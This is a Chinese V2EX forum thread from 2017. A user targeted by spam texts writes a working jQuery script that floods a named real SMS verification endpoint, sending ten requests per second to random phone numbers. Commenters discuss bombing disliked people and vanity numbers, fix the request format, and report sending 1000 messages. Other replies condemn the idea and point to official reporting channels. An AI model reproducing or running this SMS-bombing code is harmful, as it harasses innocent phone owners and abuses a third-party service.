给短信炸弹平台贡献接口。另外请指导怎么拒绝这拒绝骚扰短信。

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个专门讨论 idea 的地方。

每个人的时间，资源是有限的，有的时候你或许能够想到很多 idea，但是由于现实的限制，却并不是所有的 idea 都能够成为现实。

那这个时候，不妨可以把那些 idea 分享出来，启发别人。

这是一个创建于 2654 天前的主题，其中的信息可能已经有所发展或是发生改变。

我也不知道该怎么屏蔽这种破短信了。要不把 10690666 前缀的都屏蔽掉算了。

信息里面的网址：CcOgjKR/nc.t （为避免大家点进去，进行了 reverse，真要点的话，自己 reverse 一下： 'CcOgjKR/nc.t'.split('').reverse().join('')）

这骚扰短信真坑爹。我就试试点进去看看怎么骗人吧。第一个页面就是填手机号收验证码的。

看了下，短信接口随意跨域+不验证就发短信。爆破平台又多了一个接口。

写了个随机刷接口的 js 版本。有 jquery 就黏贴进去就行（例如测网速专用的首页，还有测网速不上 bd 上 jd 的那个网站），写了一秒钟同时十条。

（然并卵的目的：用光他的短信钱。）

真想把这个挂载一些大流量的平台上面。刷爆他的短信。

为避免误杀，我选择随机 17* 的号码段进行了。

如果你的号码被不幸刚好被随机了，那真幸运，先说一句对不起。

setInterval(() => {
  const random = parseInt(Math.random() * 1000000000);
  for(let i = 10; i--;) {
    $.post('https://chaoshi-api.jujinpan.cn/0.2/tool/send-verify-code', {
      mobile: 17000000000 + random + i,
      msg: '辣鸡广告，刷爆你的短信',
    });
  }
}, 1000);

短信

random

Reverse

ccogjkr

33 条回复 • 2017-12-04 18:10:06 +08:00

SingeeKing

2017-07-31 11:48:18 +08:00

我选择使用

'CcOgjKR/nc.t'[::-1]

clearbug

2017-07-31 12:02:59 +08:00 via Android

还能用不？等下回去轰炸下自己讨厌的人

fangpeishi

2017-07-31 12:14:59 +08:00

如果用这个轰炸一下一些靓号，那些大佬很快就会去投诉，然后短信通道就会被关了的。
13888888888
13866666666
13555555555
。。。。

anheiyouxia

2017-07-31 12:21:19 +08:00 via Android

@clearbug 同一个号码最多发 6 条

shenqi

2017-07-31 12:21:42 +08:00

@clearbug 炸不了，一个号码一分钟发一条，这个后台设定了。

shenqi

2017-07-31 12:21:59 +08:00

@fangpeishi 好思路。

shenqi

2017-07-31 12:22:19 +08:00

@SingeeKing 看不懂这是哪门语言的。

doublleft

2017-07-31 12:31:14 +08:00

思路奇特。
你不去举报垃圾短息，却跟人家验证码发送平台过意不去，而且还乱发短信。

shenqi

2017-07-31 12:33:39 +08:00

@doublleft 不知道去哪里举报，求一条明路。

anheiyouxia

2017-07-31 12:41:35 +08:00 via Android

@shenqi 千万不要去 12321 举报，举报多了会有很多平台的验证码都收不到

SingeeKing

2017-07-31 12:53:58 +08:00

@shenqi Python

doublleft

2017-07-31 13:31:26 +08:00

@shenqi 12321，唯一且有效的官方途径

tabris17

2017-07-31 13:38:20 +08:00

可以投诉这个短信网关，ISP 会关掉的

shenqi

2017-07-31 13:51:58 +08:00

@anheiyouxia 我已经上去举报。要是很多平台收不到短信我就换一个小号咯。

@doublleft 感谢提供。

@tabris17 已经上 12321 举报。

clearbug

2017-07-31 15:00:08 +08:00

奇怪，msg 可以请求中自己定义？

shenqi

2017-07-31 15:07:54 +08:00

@clearbug msg 只是我用来让他们查看记录时候清楚知道干啥了而已。如果他们有存储的话。

TigerK

2017-07-31 15:17:40 +08:00

举报到 12321，运营商就会屏蔽这个端口向你的手机发送短信了，收到垃圾邮件也可以到上面举报，让运营商直接把发信 IP 拉黑。嘻嘻～

vipper

2017-07-31 15:30:11 +08:00

通讯录白名单，可以拒绝掉这类短信

ma125125t

2017-07-31 17:57:51 +08:00

{
"msg": "手机号码格式不正确",
"code": 10001,
"data": {
"msg": "手机号码格式不正确",
"code": 10001
},
"res": 0
}

zhanghk668

2017-07-31 19:07:04 +08:00

抓一批这种发短信的地址.做一个循环遍历批量发包.2333

falcon05

2017-07-31 19:09:27 +08:00 via iPhone

你不是帮它推广了吗

shenqi

2017-08-01 09:38:30 +08:00

@falcon05
我发这个帖子的时候就想到有人这么想的。
所以除了图片里面有那个信息，其他地方都没有。

我知道 V 站的全部人员都是聪明的有钱人，不需要去借这种高利贷。

shenqi

2017-08-01 09:51:47 +08:00

@zhanghk668 那样就能自己做短信爆破平台了。

zhangneww

2017-08-01 10:06:44 +08:00

楼主这思路很是清奇啊，自己被轰炸了，然后去轰炸别人？ 170 号段果然低人一等。

dacainiaoxe

2017-08-01 14:31:05 +08:00

@fangpeishi 老哥，没找到怎么点赞的方式，给你 10 个铜币，思路真的牛逼啊哈哈哈哈哈

KgM4gLtF0shViDH3

2017-08-03 10:00:15 +08:00

为什么都是手机号码格式不正确

lynnX

2017-08-03 16:28:50 +08:00

BUG 还没修复用自己的号码试了下成功收到了验证短信

timothyye

2017-08-04 10:41:13 +08:00

@bestkayle POST 的姿势没对，不是 RAW JSON，是 x-www-form-urlencoded

KgM4gLtF0shViDH3

2017-08-04 11:47:50 +08:00

@timothyye #28 OK 了，这两天项目都用 json 传的。。。先跑个 1000 条。

timothyye

2017-08-04 12:43:37 +08:00

@bestkayle 这……

danieldong

2017-08-07 15:34:29 +08:00

没看懂呢，是说用这个就可以给随意讨厌的人疯狂发短信吗？

dexin

2017-08-09 15:46:22 +08:00

短信轰炸、短信炸弹，是指通过恶意程序，利用从各个网站上找到的动态短 URL （比如验证码发送的 URL)和前端输入的被攻击者手机号码,发送 HTTP 请求,每次请求给用户发送一个动态的短信（比如验证码短信）。最终的效果，就是朝许多无关的手机用户，发送很多验证码短信。导致手机用户被骚扰。
so,你的做法就是自己被骚扰了，通过报复的方式刷光发短信的公司短信额度，后果就是数以万计的无辜号码被骚扰
PS:现在稍微有些流量的网站都有做图形验证来防护这种恶意调用，所以你的想法不太容易实现
正解就是投诉或者直接手机拉黑此号码，前者被动以后估计都收不到验证码短信了，或者主动，起码手机拦截里面可以看到验证码短信，当然苹果手机的话就另算了

notgood

2017-12-04 18:10:06 +08:00 via iPhone

@shenqi V 友请问如何把 10690666 前缀的都屏蔽掉？我也碰到跟你一样的短信骚扰。另外还有国外的电话骚扰，全是马尔代夫的号段请问有什么屏蔽办法吗？

谢谢